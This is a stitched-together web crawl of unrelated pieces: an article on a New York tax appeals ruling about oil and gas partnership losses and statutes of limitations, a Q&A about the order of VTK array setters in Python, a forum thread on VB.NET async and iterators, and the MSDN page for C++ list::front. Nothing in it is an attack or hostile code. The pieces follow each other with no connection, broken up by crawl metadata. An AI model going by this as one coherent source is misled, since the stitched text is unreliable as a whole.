https://msdn.microsoft.com/en-us/library/a5e17kyc(v=vs.90)
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
01-26-2011 02:16 PM
that might be it. try creating a new project using Flex Mobile Project instead and just try the swipe down on it and then push it into the playbook simulator.
also were you able to test on the simulator with this app prior to attempting the Swipe Down ?
01-26-2011 02:32 PM
01-26-2011 02:38 PM
JohnPinkerton wrote:
Yes, prior to attempting to Swipe Down it loaded fine in simulator. Still does, just the Swipe Down doesn't work.
I wouldn't be too sure. If it isn't even building a .bar file in debug mode, I'm puzzled how (and whether) it could be building a .bar file in normal mode.
Is there any chance that it's actually failing to build anything new in either case, but is installing some old .bar file that doens't have any of the swipe stuff in it? People using IDEs that they're not too familiar with often get caught by things like that, in my experience. (One reason I try to avoid them most of the time.)
(The best way to check that is to change some prominent text string in your source, rebuild, and reinstall. If you see that unique string you're definitely succeeding at building it that way... then change the string to yet another new one and try again in debug mode, being sure nothing else has changed.)
01-26-2011 02:55 PM
Yeah, I had a problem once before of my app not actually building (JRad helped me through that one!
)
Just to be sure, I've moved buttons around and changed some background colors during all this.
Would it be possible to do a majority of the imports/functions without having to do actionscript import?
I started out doing a lot in design mode for the layout, but have switched over to now working mostly in source view.
01-26-2011 04:28 PM
hey johnp,
unfortunately the one of the things that seperates AS3 structure from flex is that you have to do explicit imports. i think in flex you can use a majority of mx / spark library with namespaces and without importing anything. you get used to it after a while though - great discipline
01-26-2011 05:16 PM
So not giving up easily I've been constantly still trying to make this work.
I found this thread in which Austin claims to have SWIPE_DOWN working in Flex.
So, following imports for Flex:
import qnx.events.QNXApplicationEvent;
import qnx.system.QNXApplication;
Added this to my existing oncreationComplete function
QNXApplication.qnxApplication.addEventListener(QNXApplicationEvent.SWIPE_DOWN, openAddMenu);
Then rather than go through all the Trace() headache, I did this:
private function openAddMenu(event:QNXApplicationEvent):void { Alert.show("HELLO SWIPE!"); }
Ran it to the PlayBook sim, drug down - BOOM there's the alert.
So it is recognizing the SWIPE DOWN action, now to just get a menu to slide down.
04-23-2011 09:57 AM - edited 04-23-2011 10:07 AM
Here is what I did.
In my Init class I added the listener. I also declared some default variables.
private var SLIDE_TIME:int = 1;
private var VISIBLE_Y:int = 100;
private function init():void {
// my screen start stuff
QNXApplication.qnxApplication.addEventListener(QNXApplicationEvent.SWIPE_DOWN, appMenuDisplay);
// get the menu height
menuGroup.y = -menuGroup.height;
}
Then I created the functions to handle the event and show and hide the menu.
private function appMenuDisplay(event:QNXApplicationEvent):void
{
    if (menuGroup.y != VISIBLE_Y) {
        showMenu();
    } else {
        hideMenu();
    }
}

public function showMenu():void
{
    Tweener.addTween(menuGroup, {y:VISIBLE_Y, time:SLIDE_TIME, transition:"linear"});
}

public function hideMenu():void
{
    Tweener.addTween(menuGroup, {y:-menuGroup.y, time:SLIDE_TIME, transition:"linear"});
}
My menu group is a Spark VGroup, for those of you who don't want to do pure action script.
In other examples, people were trying to catch whether or not the mouse was swiped up or down from the top bezel. With the SWIPE_DOWN call, it doesn't matter if the mouse goes up or down. I tested this with the Browser on the simulator. It doesn't matter if you swipe up or down from the top bezel, it just hides or closes the Browser based on if it was show or hidden before.
Edit....
Just realized after I posted this, that the VISIBLE_Y should be different than the height of the menu, but basically, the menu height is needed to hide the menu. So, the initial menu Y should be the negative of the height. And the Hide should be the negative of the height.
// get the menu height
menu.y = -menu.height;
|
https://supportforums.blackberry.com/t5/Adobe-AIR-Development/Swipe-Down-Event/m-p/757287
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
Pádraig Brady <address@hidden> writes:

> Jim Meyering wrote:
>> Pádraig Brady wrote:
>>
>>> Jim Meyering wrote:
>>>> Eric Blake wrote:
>>>>> According to Pádraig Brady on 10/5/2009 3:53 PM:
>>>>>>>>> This is a new test, but FC5 is soooo old,
>>>>>>>>> that I'm not sure it's worth worrying about.
>>>>>>>> March 2006?
>>>>>>> The failure is probably a function of the kernel.
>>>>>>> Which is it?
>>>>>> In summary this is what fails:
>>>>>>
>>>>>> $ touch a
>>>>>> $ ln -s a symlink
>>>>>> $ ln -L symlink hardlink
>>>>>> ln: creating hard link `hardlink' => `symlink': Invalid argument
>>>>>>
>>>>>> `man linkat` says that AT_SYMLINK_FOLLOW is only supported since 2.6.18
>>>>>> and my FC5 system is 2.6.17
>>>>> This should fix it. I don't have access to FC5, but I tested the new code
>>>>> path by priming the cache (gl_cv_func_linkat_follow=runtime ./configure)
>>>>> along with a temporary setting of have_follow_really=-1 in linkat.c. I
>>>>> also verified that the replacement is not picked up on cygwin 1.7, where
>>>>> AT_SYMLINK_FOLLOW was implemented at the same time as linkat.
>>>>>
>>>>> The patch copies from areadlink.c, as well as link_follow earlier in
>>>>> linkat.c, to create two new fd-relative helpers. For now, I didn't see
>>>>> any reason to expose them, but areadlinkat may someday be worth making
>>>>> into a full-blown module.
>>>> Wow, that was quick. Thanks.
>>>> I should have read this first.
>>>>
>>>> I was just reviewing the changes in gnulib and
>>>> see a few that should be included in the imminent coreutils
>>>> beta release, so will probably take this one, too.
>>> Needs a couple of tweaks..
>>>
>>> This needs to be added to linkat.c
>>> (seems like it should be refactored somewhere?)
>>>
>>> #ifndef SIZE_MAX
>>> # define SIZE_MAX ((size_t) -1)
>>> #endif
>>> #ifndef SSIZE_MAX
>>> # define SSIZE_MAX ((ssize_t) (SIZE_MAX / 2))
>>> #endif
>>
>> This should do it:
>>
>> From 6f6420cc9705dcfa545a28c674fddf5703e72c86 Mon Sep 17 00:00:00 2001
>> From: Jim Meyering <address@hidden>
>> Date: Tue, 6 Oct 2009 11:11:39 +0200
>> Subject: [PATCH] linkat: avoid compilation failure
>>
>> * lib/linkat.c: Include <stdint.h> for use of SIZE_MAX.
>
> That works thanks.
>
> I suppose these should include stdint.h also?
>
> areadlink.c:# define SIZE_MAX ((size_t) -1)
> areadlink-with-size.c:# define SIZE_MAX ((size_t) -1)
> backupfile.c:# define SIZE_MAX ((size_t) -1)
> fnmatch.c:# define SIZE_MAX ((size_t) -1)
> quotearg.c:# define SIZE_MAX ((size_t) -1)
> striconv.c:# define SIZE_MAX ((size_t) -1)

Note that stdint.h may not be sufficient to get SIZE_MAX. However, given that SIZE_MAX should be in stdint.h according to POSIX, maybe it makes more sense to make sure gnulib's stdint.h replacement is enabled when SIZE_MAX is not provided by the system's stdint.h? And then deprecate size_max.h in favor of stdint.

> While these already include stdint.h so should probably not redefine
>
> fts.c:# define SIZE_MAX ((size_t) -1)
> getdelim.c:# define SSIZE_MAX ((ssize_t) (SIZE_MAX / 2))
> getndelim2.c:# define SSIZE_MAX ((ssize_t) (SIZE_MAX / 2))

SSIZE_MAX should be provided by limits.h, see: The stdint.h documentation doesn't mention SSIZE_MAX:

/Simon
|
http://lists.gnu.org/archive/html/bug-gnulib/2009-10/msg00081.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
This article covers the Strategy methodology of Adaptive Object Modeling. Strategy methodology maintains that the operations and business rules or code flow of a class should be held as a collection of properties, as opposed to single method calls, so that they can be changed at runtime. A Strategy pattern is a set of algorithms. So a Strategy pattern, as it relates to AOM, is a group of different strategies that can be dynamically added as business rules to an entity at runtime.
Using a Strategy design method is an interesting way to extend the configuration possibilities of simple class object methodology. It gives a way to define a class' operations and rules dynamically, or at runtime, from a database, configuration file or user interface. Virtually any meta-data source can define the operations for a given AOM class structure. The Strategy design method uses, in this example, interface contracts and reflection to help define the limits of the operational calls.
Here we see the exact Adaptive Object Modeling UML for the Strategy class pattern based on the Design Patterns GOF95 model. Notice that the Entity object accepts and has specific operations (or strategies) associated with it. The strategy deals with actual business rule and operational rule implementations.
We start this refactoring example where we left off from our other example article Properties. We still have the same entity and entity types, and now we would like to dynamically add some operational methods or Strategies. To accomplish this we need to create a class to hold our dynamic interface contracts that are loaded during runtime. This takes the form of a simple container (or entity-attribute type) object that holds the interfaces or contracts for speaking to different strategies. This is loaded with metadata at runtime for the specific object operation that we wish to implement. Notice that we have added a collection object OperationsCollection, which contains the shared operations between the entity and the entity type:
OperationsCollection
public interface IOperation
{
void OperationMethod(object[] parameters);
}
// Collection of operations
public class OperationsCollection
{
public void Add(IOperation obj)
{
//.....addition code to collection
}
}
Here we see that the EntityType object from our last example has an added parameter of type OperationsCollection. This operations collection will allow the Entity object to have dynamically loaded, meta-data driven business rules associated with it at runtime. Now we can store any given business rule we like within our class objects, without recompiling:
EntityType
Entity
public abstract class EntityType
{
private string _typeName;
private Type _type;
private EntityAttributeCollection _attributes =
new EntityAttributeCollection();
private OperationsCollection _operations =
new OperationsCollection();
public EntityType(string name, Type type)
{
_typeName = name;
_type = type;
}
public string Name
{
get{return _typeName;}
set{_typeName = value;}
}
public Type TypeOf
{
get{return _type;}
set{_type = value;}
}
public EntityAttributeCollection Attributes
{
get{return _attributes;}
set{_attributes = value;}
}
public OperationsCollection Operations
{
get{return _operations;}
set{_operations = value;}
}
}
We have also created functional method objects inheriting from IOperation, which define the exact method operations we will allow to be adapted to our entity object. Having the interface allows us to tie that interface to any class method we wish, as long as that class implements IOperation.
IOperation
Note: The operational methods could be contained in other assemblies; the namespace encapsulation becomes unimportant, because you can add attributes or methods via the metadata, without any concern for their source at compile time. Also, the operation method interface IOperation could be changed to dynamically define strongly typed parameters as well, but this will be saved for either another article or your own invention. Remember, reflection is used heavily, as we will see in the factory class, and is the key to dynamic representation of contractual interfaces.
public class JobOperation1 : IOperation
{
void IOperation.OperationMethod(object[] parameters)
{
Console.WriteLine("..." + this.GetType().Name +
".OperationMethod method called.");
foreach(object obj in parameters)
Console.WriteLine("... parameter Type:" +
obj.GetType() + " Value:" + obj);
}
}
public class JobOperation2 : IOperation
{
void IOperation.OperationMethod(object[] parameters)
{
Console.WriteLine("..." + this.GetType().Name +
".OperationMethod method called.");
foreach(object obj in parameters)
Console.WriteLine("... parameter Type:" +
obj.GetType() + " Value:" + obj);
}
}
We are now ready to focus on the AOMFactory class, which is a static factory implementation loosely based on Deyan Petrov's DataSourceFactory. The factory is where we will actually load our runtime data for this example.
AOMFactory
DataSourceFactory
The first piece of data we get after this revision to our Properties example is the meta-data for the operation. We will use this data to build and define all the possible types of operational interfaces we can load to our entity types, making them available to specific entities. The class with the methods we wish to add inherits from the IOperation interface, providing access to its methods directly.
string name = Convert.ToString(hash["name"]);
//the name of this attribute
if(name == null || name == string.Empty)
throw new FactoryException("No operation name specified.");
//get the attribute type
string strOperationType = Convert.ToString(hash["type"]);
if(strOperationType == null || strOperationType == string.Empty)
throw new FactoryException("No Type specified for operation " + name);
//get the type for a strongly typed parameter
Type operationType = Type.GetType(strOperationType);
if(operationType == null)
throw new FactoryException("Could not load class Type for type " +
strOperationType + " for operation " + name);
Here we make sure the class implements the interface and create an instance of the interface from the class type that holds the wanted operational methods. As we said above, this gives a lot of flexibility to the business flow and allows different assemblies to provide new data on the fly.
Type interfaceType =
operationType.GetInterface(typeof(IOperation).FullName);
if(interfaceType == null)
throw new FactoryException("No interface of type IOperation " +
"exists for operation " + name);
IOperation operation =
(IOperation)Activator.CreateInstance(operationType);
if(_entityOperations == null)
_entityOperations = new Hashtable();
if(!_entityOperations.Contains(operation))
_entityOperations.Add(name,operation);
The config file defines the different operations by name and their implementation classes full type name. As we said above, the actual operational namespace can be internal or external. The meta-data from the config file appears thus:
<entityOperations>
<entityOperation name="JobOperation1"
type="Strategy.ImplClasses.JobOperation1" />
<entityOperation name="JobOperation2"
type="Strategy.ImplClasses.JobOperation2" />
</entityOperations>
Next we check to see if the hashtable that will hold our Strategy interfaces exists and contains the current data. If not we will add the new operation to the entityType object.
entityType
EntityType entityType = (EntityType)Activator.CreateInstance(entityTypeOf,
new object[]{name,entityTypeOf});
foreach(string attribute in attributes)
....
foreach(string operation in operations)
if(!entityType.Operations.Contains((IOperation)_entityOperations[operation]))
entityType.Operations.Add((IOperation)_entityOperations[operation]);
The meta-data from the config file appears as below. Notice the operations XML node. This is where we put all the possible operation types by name for each EntityType instance. The operation names are comma delimited. This is how we define which strategy and business rule relationships we will associate with the entity instance.
operations
<entityTypes>
<entityType name="ExecutiveJobEntityType"
type="Strategy.ImplClasses.ExecutiveJobEntityType"
attributes="Attribute1,Attribute3"
operations="JobOperation1,JobOperation2" />
<entityType name="EmployeeJobEntityType"
type="Strategy.ImplClasses.EmployeeJobEntityType"
attributes="Attribute2,Attribute4"
operations="JobOperation2" />
</entityTypes>
We now are at a point where we can test our code.
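Before looking at the output, here is a rough sketch of the simplest possible check, calling one of the strategies above directly through its contract (the parameter values are made up purely for illustration):
// Hypothetical smoke test: invoke a strategy through the IOperation contract.
// JobOperation1 is one of the implementation classes shown earlier;
// OperationMethod is explicitly implemented, so it must be called via the interface.
IOperation operation = new JobOperation1();
operation.OperationMethod(new object[] { "Executive", 100000 });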
Here we see that the entity is first established from the entity type and its operations have been called.
How can we expand this example to functional code? We need to establish how the operational methods influence the program flow, and define our entity relationships and entitytype relationships if applicable. These items we will cover in the next article.
This is the third article in this series. Patterns and adaptive models are only design templates, helpers to accommodate better overall design. I must stress that making an effort to use advanced design methodologies will strengthen your overall design ability, but like your basic coding skills, it is something that has to be learnt and cultivated.
If this or any other article in this series on adaptive object modeling design is helpful to you, or you have questions or comments, please e-mail me at chris.lasater@gmail.com.
Other articles in this series include:
Christopher G. Lasater wrote:I reviewed your comment again. Actually the collection was just a storage for the strategy classes. No composite was implied. Still don't see how you figured the code was a composite.
Christopher G. Lasater wrote:Do you have an idea you would like to share that might improve the pattern?
http://www.codeproject.com/Articles/10089/Refactoring-to-Adaptive-Object-Modeling-Strategy-P?msg=1855623
11 May 2007 17:01 [Source: ICIS news]
LONDON (ICIS news)--The International Energy Agency (IEA) has renewed its call on OPEC to increase oil output before the summer to avoid a sharp decline in global oil stocks.
In its monthly oil market report, the Paris-based IEA estimated total OPEC production for April at 30.35m bbl/day.
Nigerian crude capacity shut-ins rose to 815,000 bbl/day in early May, adding to pressures caused by a gasoline market already tightened by an unusually high level of unplanned refinery outages, IEA said.
Unsurprisingly, gasoline remained the primary driver behind oil prices, with US retail prices reaching levels not seen since the post-Hurricane Katrina spike in September 2005.
Seasonal refinery maintenance and a spate of unplanned outages were expected to depress global throughput, IEA said. With demand increasing in June, this implies that there will be a further tightening of product stocks.
Refinery runs, and therefore crude demand, should rise sharply in July (2.5m bbl/day over March) as refiners seek to meet peak summer demand.
Preliminary OECD stock data continued to point to a 930,000 bbl/day draw in first-quarter total oil stocks, following on from a similar draw in the previous quarter. Forward demand cover provided by total oil inventories remained around the five-year average, but gasoline stocks are low in all regions.
World oil output in April rose by 55,000 bbl/day to 85.5m bbl/day, with OPEC supply levelling off near 30.3m bbl/day. Non-OPEC growth in 2007 was trimmed to 1.0m bbl/day, plus 0.2m bbl/day of OPEC NGLs. This leaves the 2.3m bbl/day rise in the ‘call on OPEC’ by the fourth quarter running well ahead of expected OPEC capacity additions, implying lower spare capacity later in the year.
Global oil product demand was revised down marginally to 84.2m bbl/day in 2006 and 85.7m bbl/day in 2007 following adjustments to baseline historical data. The changes were centred
http://www.icis.com/Articles/2007/05/11/9028233/iea-calls-on-opec-to-help-build-up-stocks.html
Hi All,
I am new to Lucene!
I am trying to write my own analyzer (myAnalyzer) in Lucene. I wrote it and
compiled it, then I added myAnalyzer.class to the folder
\org\apache\lucene\analysis and created a new jar file which
contains myAnalyzer and the other files. Then I imported myAnalyzer in
IndexFile.java successfully:
import org.apache.lucene.analysis.myAnalyzer;
After that I modified this command in IndexFile.java:
IndexWriter writer = new IndexWriter("index", myAnalyzer(), true);
Unfortunately there is some error here which I couldn't recognize. I feel I
didn't miss any step, and myAnalyzer.java compiled without any error.
Thanks in advance
Farag
--
View this message in context:
Sent from the Lucene - Java Users mailing list archive at Nabble.com.
---------------------------------------------------------------------
To unsubscribe, e-mail: java-user-unsubscribe@lucene.apache.org
For additional commands, e-mail: java-user-help@lucene.apache.org
http://mail-archives.apache.org/mod_mbox/lucene-java-user/200807.mbox/%3C18360568.post@talk.nabble.com%3E
Microlog - a Log4j-based tool for Java ME
Introduction
When we add logging to code, we insert statements that give us useful output at runtime, such as information about malfunctioning code and unexpected errors and behaviors. Examples of logging are trace statements, dumps of data structures and the familiar System.out.println or printf debug statements. Although it scatters and tangles code - making the software more difficult to understand, extend and maintain - there is no doubt that logging helps from many points of view.
Overview
In the J2SE and J2EE platforms, the log4j API offers a hierarchical way to insert logging statements within a Java program. The API offers multiple output formats and multiple levels of logging information, allowing developers to get different kinds of log messages. In the context of the J2ME platform, an interesting logging API is MicroLog (created by Johan Karlsson), which is based on the log4j API. For additional information, see the MicroLog official website.
Recently I used the MicroLog API and had some trouble finding good examples to help me use it. So, in this post, I'll try to show you how nice this API is by walking through the main functionality provided by MicroLog and how you can use it for logging. First of all, you can download the latest API release from the SourceForge repository. MicroLog is open source and you can also download the source code. Become a contributor!
Usage
The use of MicroLog revolves around 3 main classes:
- public final class Logger: Logger is responsible for handling the main log operations.
- public interface Appender: Appender is responsible for controlling the output of log operations.
- public interface Formatter: Formatter is responsible for formatting the output for Appender
With these 3 aforementioned concepts, it is possible to log different kinds of log messages.
Logger Component
The logger is the main component. In addition to other operations, the Logger component can be used to set up the Logger Level, such as DEBUG, ERROR or INFO. In the MicroLog API, the following log levels are available:
- DEBUG, INFO, WARN, ERROR and FATAL.
A logger will only output messages whose level is greater than or equal to its own. As we can see in Table 1, if you set the level (or the global level) to WARN, only WARN, ERROR and FATAL messages will be displayed.
To initiate your logging process, first create a new Logger instance (as discussed earlier). There are three ways to do that:
Logger logger = LoggerFactory.getLogger(); Creates a logger without a name
Logger logger = LoggerFactory.getLogger(String loggerName); Creates a logger passing a logger name (loggerName variable)
Logger logger = LoggerFactory.getLogger(Class class); Creates a logger with a class reference, such as your MIDlet class.
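Putting the two ideas together, the following is a minimal sketch of creating a logger and letting the level threshold filter messages. It uses the ConsoleAppender introduced in the next section, and the package names for Logger, LoggerFactory and Level are assumptions based on the configuration example later in this post.

import javax.microedition.midlet.MIDlet;
import javax.microedition.midlet.MIDletStateChangeException;

import net.sf.microlog.core.Level;          // package names assumed from the
import net.sf.microlog.core.Logger;         // microlog.properties example below
import net.sf.microlog.core.LoggerFactory;
import net.sf.microlog.core.appender.ConsoleAppender;

public class LevelExample extends MIDlet {
    private final Logger log = LoggerFactory.getLogger(LevelExample.class);

    public LevelExample() {
        this.log.addAppender(new ConsoleAppender()); // send output to the console
        this.log.setLogLevel(Level.WARN);            // threshold: WARN and above
    }

    protected void startApp() throws MIDletStateChangeException {
        this.log.debug("suppressed");   // below WARN, so it is not emitted
        this.log.warn("emitted");       // at the threshold
        this.log.error("emitted too");  // above the threshold
    }

    protected void pauseApp() {}

    protected void destroyApp(boolean unconditional) throws MIDletStateChangeException {}
}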
Appender Component
The process of logging requires that you define the output destination for messages, such as a file, the console or a Bluetooth connection. Like Log4j, MicroLog defines many kinds of appenders. In the context of the J2ME platform, there are many appenders that can be used in MIDP to send your log messages, such as RecordStoreAppender, which stores your log messages in the RecordStore, BluetoothSerialAppender, which sends your log messages over a Bluetooth connection, and FormAppender, which shows the messages in a Form (LCDUI) interface. The following Figure illustrates a summarized UML diagram that shows how they are organized.
The AbstractAppender defines an interface with a set of methods where all other appenders should redefine them in their own class. For instance, consider a FormAppender. It uses the doLog method to send (show) log messages to a Form reference (form.append()), clear() for cleaning up all messages (form.deleteAll()), and open() to create a new Form (default) instance.
In this section, I'll show you how to send log messages to a Form (LCDUI) interface and to a bluetooth connection. The former is shown in our first example. After creating a Logger reference (which has "Form Logger" as its name), we created a new FormAppender instance, passing our Form reference (which will display the log messages). log.addAppender(appender) can be used to associate our new appender reference. It is important to point out that you can create as many appenders as you wish, just calling addAppender(). As a result, you can send log messages, at the same time, to a File (through FileConnectionAppender) and to a datagram connection.
import javax.microedition.lcdui.Display;
import javax.microedition.lcdui.Form;
import javax.microedition.midlet.MIDlet;
import javax.microedition.midlet.MIDletStateChangeException;
// ...plus the Microlog imports for Logger, LoggerFactory and FormAppender.

public class FormExample extends MIDlet {
    private Display d;
    private Form f;
    private Logger log;
    private FormAppender appender;

    public FormExample() {
        this.d = Display.getDisplay(this); //creates display instance
        this.f = new Form("Loggin"); //creates a form
        this.log = LoggerFactory.getLogger("Form Logger"); //creates a Logger
        this.appender = new FormAppender(this.f); //creates an appender to add log outputs
        this.log.addAppender(this.appender); //adds the output log to a form
        this.log.debug("Constructed object!"); //logs a message
    }

    protected void destroyApp(boolean arg0) throws MIDletStateChangeException {}

    protected void pauseApp() {}

    protected void startApp() throws MIDletStateChangeException {
        this.d.setCurrent(this.f);
        this.log.debug("Starting midlet..."); //logs a message
    }
}
And the result is:
Our next example shows how to send log messages to a Bluetooth connection. The BluetoothSerialAppender can be used for this goal; it uses the btspp protocol and works in two different modes: (1) the implementation tries to find the Bluetooth logger server through Bluetooth service lookup, or (2) you specify the exact URL of the server, which is useful for devices that fail to look up the server. Microlog also has two types of server: (1) a datagram server and (2) a Bluetooth server. You can download both here.
The following code demonstrates how to use BluetoothSerialAppender:
// Requires the MIDlet imports shown above plus the Microlog imports for
// Logger, LoggerFactory, Level and BluetoothSerialAppender.
public class BluetoothExample extends MIDlet {
    private Logger log;
    private BluetoothSerialAppender appender;

    public BluetoothExample() {
        this.log = LoggerFactory.getLogger(BluetoothExample.class); //creates a logger instance
        this.log.setLogLevel(Level.DEBUG); //sets the log level
        //creates a bluetooth appender
        this.appender = new BluetoothSerialAppender("btspp://001F3AD69B44:1;authenticate=false;encrypt=false;master=false");
        this.log.addAppender(appender); //adds the appender to the log reference
        this.log.debug("Constructed object!"); //logs a message
    }

    protected void destroyApp(boolean arg0) throws MIDletStateChangeException {}

    protected void pauseApp() {}

    protected void startApp() throws MIDletStateChangeException {
        this.log.debug("Starting midlet...");
    }
}
In our example, we passed the exact Bluetooth server URL: btspp://001F3AD69B44:<channel>;authenticate=false;encrypt=false;master=false, where you can replace "<channel>" with a low number such as 1 or 2 (depending on which one is being used). After the double slashes, 001F3AD69B44 identifies the Bluetooth logger server. The result of this example is shown in the next Figure, where I used my desktop as the Bluetooth server.
WARNING: Be careful when using Bluetooth-based logging. If your application already uses Bluetooth connections, the Bluetooth buffer can fill up if a lot of data is sent and received!
Formatter Component
To format a message, an Appender must have an associated Formatter object. MicroLog has two different formatters: (1) The SimpleFormatter is the default and the simplest formatter, and (2) the PatternFormatter offers more flexibility for choosing which information will appear in the log message. If you are not satisfied with them, you can also create your own formatter class (discussed later) and define your own message format. Formatters implement the same interface (Formatter), which can be seen in the following Figure. The format() method is where the formatting of the message really occurs, where we have the logger name, the logger level, a related message and a throwable object.
The following steps show how to associate a formatter to an appender reference (in this context, the log messages will be sent to the console).
Logger log = LoggerFactory.getLogger("Logger With SimpleFormatter");
ConsoleAppender appender = new ConsoleAppender(); //creates a Console appender
Formatter formatter = new SimpleFormatter(); //creates a simpleFormatter
appender.setFormatter(formatter); //adds a formatter to a specific appender
log.addAppender(appender); //adds the appender to the logger
log.debug("Constructed object!"); //logs a message
The SimpleFormatter would print:
0:[DEBUG]-Constructed object!
As we can see, the SimpleFormatter is very simple. However, the PatternFormatter offers a more sophisticated way to format log messages. It works by letting you define your own formatting pattern, where you choose which information will appear in the message. For instance, consider our next example:
Logger log = LoggerFactory.getLogger();
PatternFormatter formatter = new PatternFormatter(); //Creates a PatternFormatter
formatter.setPattern("%t %d [%P] %m %T"); //specifies which data will be appended to the message
Appender appender = new ConsoleAppender();
appender.setFormatter(formatter);
log.addAppender(this.appender);
The message output would be:
Thread-0 12:54:18,815 [DEBUG] Starting app...
Note that the message format was constructed based on some "special characters" using formatter.setPattern(). The following list shows which types of characters you can use:
- %c - prints the name of the Logger
- %d - prints the date (absolute time)
- %m - prints the logged message
- %P - prints the priority, i.e. the Level of the message.
- %r - prints the relative time of the logging. (The first logging is done at time 0.)
- %t - prints the thread name.
- %T - prints the Throwable object.
- %% - prints the '%' sign.
If you are not satisfied with these two formatters, you can also create your own. For instance, let's say that we want to format a log message as follows:
$ sequenceNumber $ Log Level $ Message $
To create our own formatter, we just implement the Formatter interface and build the message in the format method. The example defines an int field (to show the sequence number) and a delimiter ($) to separate each piece of data (sequence number, log level and message).
public class MyFormatter implements Formatter {
private static final String DELIMETER = " $ ";
private int sequence;
private StringBuffer buffer;
public MyFormatter() {
this.sequence = 0; //the sequence of messages
this.buffer = new StringBuffer(); //message to be shown
}
public String format(String clientID, String name, long time, Level level,
Object message, Throwable t) {
this.buffer.delete(0, buffer.length()); //delete previously logged message
this.buffer.append(DELIMETER); //appends delimeter
this.buffer.append(this.sequence++); //increments sequence message number
this.buffer.append(DELIMETER); //appends delimeter
this.buffer.append(level); //appends the log level
this.buffer.append(DELIMETER); //appends delimeter
this.buffer.append(message); //appends log messages
this.buffer.append(DELIMETER); //appends delimeter
return buffer.toString(); //creates the entire log message
}
}
The result is:
$ 0 $ DEBUG $ Constructed object! $ $ 1 $ DEBUG $ Starting middlet... $
Using a Configuration File
MicroLog also offers a mechanism to put your log configuration into a configuration file instead of setting it up in code. The advantage of using an external file is that changes to the log configuration do not require recompiling the software. However, because of the extra I/O, the process can be slower.
The following listing shows a configuration file that sets the log level to WARN, uses two different appenders (console and file) and one formatter (PatternFormatter). The configuration file is called microlog.properties and can be saved into the /res project folder.
microlog.level=WARN
microlog.appender=net.sf.microlog.core.appender.ConsoleAppender;net.sf.microlog.midp.appender.FileConnectionAppender
microlog.formatter=net.sf.microlog.common.format.PatternFormatter
microlog.formatter.PatternFormatter.name=MyFormatterName
microlog.formatter.PatternFormatter.pattern=%c %d [%P] %m %T
# End of file.
The PropertyConfigurator class is responsible for loading the configuration file.
public class PropertiesExample extends MIDlet {
private Logger log;
public PropertiesExample() {
this.log = LoggerFactory.getLogger();
PropertyConfigurator.configure("/microlog.properties"); //loads the configuration file
}
protected void destroyApp(boolean arg0) throws MIDletStateChangeException {}
protected void pauseApp() {}
protected void startApp() throws MIDletStateChangeException {
this.log.info("info");
this.log.error("Constructed object! erro");
this.log.debug("debug");
this.log.fatal("afta");
this.log.warn("warn");
}
}
The output is shown below. First, note that only ERROR, FATAL and WARN messages were sent to the output, because we set our log level to WARN. Second, the log messages were also sent to a file, created at ///root1/microlog.txt.
Loading properties from /microlog.properties
Added appender net.sf.microlog.core.appender.ConsoleAppender@1cb37664
Added appender net.sf.microlog.midp.appender.FileConnectionAppender@f828ed68
Using formatter class net.sf.microlog.common.format.PatternFormatter
The created file is
20:34:43,151 [ERROR] Constructed object! error
20:34:44,119 [FATAL] afta
20:34:44,809 [WARN] warn
Finally, the MicroLog framework seems to be a good contribution to the Java ME platform, given its simplicity (it is based on the Log4j framework) and the lack of good tools for debugging Java ME applications while they are running on a real mobile device.
Featured article, October 11th 2009 (week 42)
Ekagga Technologies - Problem while integrating logger for s40 device Nokia Asha 501
I am using Nokia Asha SDK 1.0. I am trying to integrate Microlog to log to a file using a configuration file, but I got the following error:
jarFileName is java.lang.NoClassDefFoundError: net/sf/microlog/core/LoggerFactory
Here is my code :
and I have saved the microlog_file.properties file in /res folder of my project with following contents :
# This is a simple Microlog configuration file
microlog.level=DEBUG
microlog.appender=FileAppender
microlog.appender.FileAppender.filename=MemoryCard/micrologtestlog.txt
microlog.formatter=net.sf.microlog.core.format.PatternFormatter
microlog.formatter.PatternFormatter.pattern=[%P] %c %d (%r): %m %T
Thanks
If anyone has a clue, please post it.
Ekagga Technologies (talk) 17:08, 3 October 2013 (EEST)
http://developer.nokia.com/community/wiki/Microlog_-_a_Log4j-based_tool_for_Java_ME
UPDATED LINK: (tl;dr)
Our friends over in the ASP.NET team are working on a very nice, lightweight web-browser eventing technology called SignalR. SignalR allows server-pushed events into the browser with a variety of transport options and a very simple programming model. You can get it via NuGet, watch it grow and get the source on GitHub. There is also a very active community around SignalR chatting on Jabbr.net, a chat system whose user model is derived from IRC, but that runs – surprise – on top of SignalR.
For a primer, check out the piece that Scott Hanselman wrote about SignalR a while back.
At the core, SignalR is a lightweight message bus that allows you to send messages (strings) identified by a key. Ultimately it’s a key/value bus. If you’re interested in messages with one or more particular keys, you walk up and ask for them by putting a (logical) connection into the bus – you create a subscription. And while you are maintaining that logical connection you get a cookie that acts as a cursor into the event stream keeping track of what you have and have not seen, which is particularly interesting for connectionless transports like long polling.
SignalR implements this simple pub/sub pattern as a framework and that works brilliantly and with great density, meaning that you can pack very many concurrent notification channels on a single box.
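As a rough illustration of that programming model, a hub in early SignalR looked something like the sketch below. The exact namespaces and client-invocation syntax changed across releases, so treat the names here (SignalR.Hubs, ChatHub, Send, addMessage) as assumptions rather than a definitive sample.

// Minimal hub sketch: a server-side method that broadcasts a string to every
// connected client by invoking a client-side callback named "addMessage".
using SignalR.Hubs;

public class ChatHub : Hub
{
    public void Send(string message)
    {
        // Clients is a dynamic proxy; addMessage must match the handler
        // registered in the browser.
        Clients.addMessage(message);
    }
}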
What SignalR, out-of-the-box, doesn’t (or didn’t) provide yet is a way to stretch its message bus across multiple nodes for even higher scale and for failover safety.
That’s where Service Bus comes in. msec more latency.
If you want to try it out, here are the steps (beyond getting the code):
In the above example, {namespace} is the Service Bus namespace you created following the tutorial steps, {account} is likely “owner” (to boot) and {key} is the default key you copied from the portal. {appname} is some string, without spaces, that disambiguates your app from other apps on the same namespace and 2 stands for splitting the Service Bus traffic across 2 topics.
Most of the SignalR samples don’t quite work yet in a scale-out mode since they hold local, per-node state. That’s getting fixed.
http://vasters.com/clemensv/CommentView,guid,e8d14433-f773-4a19-91c0-138a9770a7c8.aspx
It's recommended practice to change the mouse cursor to
an hourglass wait cursor to inform the user that the program is
working on something. This is easy enough to do when the programmer
knows in advance that something is going to take a while.
However, there are often circumstances where you can't predict
how long something is going to take, so it's hard to know whether
to display the hourglass or not. Ideally, you'd like the cursor
